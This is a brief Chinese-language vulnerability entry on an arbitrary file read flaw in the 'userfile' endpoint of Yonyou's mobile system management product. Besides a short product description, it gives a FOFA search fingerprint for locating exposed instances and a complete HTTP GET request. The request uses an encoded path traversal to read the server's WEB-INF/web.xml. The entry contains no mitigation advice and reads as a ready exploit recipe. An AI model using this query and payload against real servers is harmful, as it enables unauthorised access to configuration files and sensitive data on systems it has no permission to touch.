用友移动管理系统userfile存在任意文件读取漏洞
一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统userfile存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。
二、影响版本
- 用友移动系统管理系统
三、资产测绘
- fofa
app="用友-移动系统管理" - 特征
四、漏洞复现
GET /mobsm/common/userfile?path=%5C..%5Cwebapps%5Cnc_web%5CWEB-INF%5Cweb.xml HTTP/1.1
User-Agent: Java/1.8.0_391
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close